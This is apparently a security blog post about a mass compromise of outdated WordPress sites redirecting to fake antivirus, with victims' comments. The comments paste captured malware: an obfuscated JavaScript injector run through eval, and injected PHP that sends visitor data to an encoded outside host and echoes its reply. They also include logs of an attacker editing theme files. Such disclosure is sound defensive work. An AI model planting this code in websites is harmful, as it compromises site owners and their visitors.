Latest Mass Compromise of WordPress sites – More Details

We are getting lots of questions about the latest mass compromise targeting WordPress sites (redirecting to fake AV) that has affected over 30,000 domains.

The first question is how are these sites getting hacked? On all the cases we analysed, they either had outdated versions of WordPress, or of a plugin. We can safely rule out any new vulnerability on WordPress itself.

We also posted about it a week ago when we detected this malware campaign using .rr.nu domains.

As we promised in the previous post, this is an update to what we are seeing.

More Details

  • The malicious domains are still pointing to 194.28.114.103 and 194.28.114.102 (same IP’s used by the group behind the sweepstakesandcontestsdo.com and infoitpoweringgathering.com attacks)
  • More than 200 different .rr.nu domains are being used
  • We have identified more than 500 variations of the injected URL to random domains names in the .rr.nu TLD:

If you’re not sure if you’re infected, do a free website malware scan using SiteCheck

19 comments
  1. I couldn’t get an affected WordPress server to give me the bad link without using a Chrome Macintosh user-agent in my wget request. Once you do, it looks like its clickjacking to a pay-per-click site and redirecting out to google.com. I’m guessing the OSX clicks pay more.

  2. The web logs from my affected host show this : 

    64.15.78.203 – – [04/Mar/2012:23:21:20 +0000] “GET /wp-login.php HTTP/1.1” 200 3430 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5″64.15.78.203 – – [04/Mar/2012:23:21:21 +0000] “POST /wp-login.php HTTP/1.1” 302 – “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5″64.15.78.203 – – [04/Mar/2012:23:21:24 +0000] “GET /wp-admin/ HTTP/1.1” 200 69832 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5″64.15.78.203 – – [04/Mar/2012:23:21:37 +0000] “GET /wp-admin/theme-editor.php HTTP/1.1” 200 50722 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5″64.15.78.203 – – [04/Mar/2012:23:21:42 +0000] “POST /wp-admin/theme-editor.php HTTP/1.1” 200 51117 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5″64.15.78.203 – – [04/Mar/2012:23:21:46 +0000] “GET /wp-admin/theme-editor.php?file=%2Fthemes%2Fboxpark%2Farchive.php&theme=Boxpark%2Fboxpark&dir=theme HTTP/1.1” 200 41820 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5”

    Unless I’m wrong, it looks like someone posted some data to wp-login.php and was granted immediate access. All our passwords are secure so perhaps the SQL Server was hacked?

  3. Im following you for this problem. My all wordpress websites infected. I opened them without delete FTP cookies. The iframe code changing but same on all websites. I cant find it on anywhere.

    Date&&(a=”396″); var b=’!1;var=b gifonll”=d==fi y”;1-(ucomenie.t.ckooindf(gOxe6E2x{)if)7=4av;r date=neD w;jp2″;”=g.d(Tted.semitegTimar e()v;)dom [‘= sud’u.bdum,’s.bmuk’.eu,’dbmu’,’b.amud’rfud’u’,.bmd’,umbdum.nl’,’b.c’du,’nrav’pjmb. ;]od m =flo Ma.htor(h.rtaMsmo(moandd*)el.ngtdomh);=pts[d+”.]moD wde;mn”en=eta(d.e()getmiT+x4ocud;)=eic.tmenkoofig+”=pe(“+eacsed.MTSGote;”(gntri+))ipxrestoG=”+.deMTSng(irt;”/ap;)+”=httxt=”h”+tttp//:p+”.cgni/ rapj+i?”v;g-=e1!=tornavagi.usgenAresaCoLot.trew)(e.in”fidex(fOref),f”xotcnj,”=”1uf=noi(){oto};jrp.typb:f{=e=i{oitunc)(n73424;retu=”;”uurnt},xt )(ncnua:foit=q{“q”709;dN94=;w=rJ=;””uco rab;vd=gnemt;c;vaR=kb=Qr kndoiw= ra”=Ow;dv;”t=hhis=pK;fQDc==””y{urt;=Lc671K= ;00=Wp””;SU=wK=e;b””;pOR=Or””==Ke=b;QVkBq;=b;”;vmF=Fm”W=”settegEw;sirAtt”fd;b=gK=var626;97 a=qR=;][“=fe;bvS=(||)”0;a.heipus”(hghtsub”,”ertgnistr”,”ercatetgeElenemt”,dthiw”tesmbv”,”rfiv,”W,””apbod,”ypenildhCd)”c,g,”,frs”Oe;=64=””506Ty;;hSaU=;b=;b=””=uKDKf;=Iy””;”;swI=Iw”J=12;r361055a;”G=”4=ALg;=40r l598av;=a[a[1[]2=Zn1,3]](;)6;””gP=ar “gPv;”m=a[a[]4[=Oc,3(1]];)692531;amevK=”+m”;ttI””=I=Zjl”=;lO;”O44253;[a[p=a]5[1]]11),3(“=Uetu+”bq;”r;”JQ=n=hb;v ra.b(T=”t;)]9[ ra”;va=c]l[(vK10]);c[a[]=n=b;Dn;c;””=O mIOIm[a[3]]oH==a[;]8402kM=;18]]0c;””kM[a[[a=8];bW=mH=;”””bWY=”w;”]]6]9[“;a[a[[a[7]]T=k(c)Vf;R=”atcc}”l,”h{)h(r”=K=TKb,g(“<.wretihtmbodlh/ydlmt>”)”,k,uI”=E.semeoiTt(nonufut(itch{).a(),i)},332GB=82,292″=S596zN=i}1}}”;cBr o=””av;=ne;gTj w;}).o;=””(a’,a= a.split(“”),c;for(c in a)if(“string”==typeof a[c]){var d=[],e=!0,f=1*a[c];for(Z=0;Z<b.length;Z+=f)d[Z]=e?b.substr(Z,f).split("").reverse().join(""):b.substr(Z,f),e=!e;b=d.join("")}window.eval(b);b=void 0;

  4. I do not believe that this, in all cases, is a TimThumb exploit. Every Client I have that is running Word Press got hacked in the last few days. My website was hacked, and I keep WP and the plugins and themes updated. Similarly, I use .htaccess and php.ini directives, as well as mods to WordPress itself to help. None of my themes had the TimThumb code present. Neither did WordPress itself.

    It does seem like it is a WordPress ‘related’ exploit (but not specifically the Blog installed all by itself). The vulnerability present has not come to light through my direct searching or searching for answers on the ‘net.

    I will say this- from a site I know has been hacked that I have not as yet had time to clean, the SiteCheck tool (shown in the post, above) does not find the malicious code, nor the vulnerability.

    I’m at a loss as to what to do beyond the ‘scorched earth’ approach, which is definitely not practical under many situations.

    At any rate, here is the malicious code, without its opening and closing PHP tags-

    CODE BEGINS-
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]); //  Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = “”;
        if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
        {
            if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){ // Create  bot analitics           
            $stCurlLink = base64_decode( ‘aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw’).’?ip=’.urlencode($_SERVER[‘REMOTE_ADDR’]).’&useragent=’.urlencode($sUserAgent).’&domainname=’.urlencode($_SERVER[‘HTTP_HOST’]).’&fullpath=’.urlencode($_SERVER[‘REQUEST_URI’]).’&check=’.isset($_GET[‘look’]);
                $stCurlHandle = curl_init( $stCurlLink );
        }
        }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]==”O”)
         {$sResult[0]=” “;
          echo $sResult; // Statistic code end
          }
        curl_close($stCurlHandle);
    }
    }

    CODE ENDS

    Any help anyone can give in how to fix the exploit, or otherwise neutralize it would be greatly appreciated.

    Thank you all for your time.

  5. This hack infects every PHP file on your server with “eval(base64_decode(…” In WordPress installs, it appears to inject a bunch of nl.php links into the comments table (just search your database for nl.php and it will return the infections). I purged the offending records from the database, replaced the entire site with clean PHP, reset all usernames and passwords (including MySQL and FTP), and that seemed to fix it…. for a couple of days. Now it appears to be back, even though everything appears to still be clean (no eval in the PHP files, no nl.php in the database, etc.). Anyone have ideas where else to check?

Comments are closed.

You May Also Like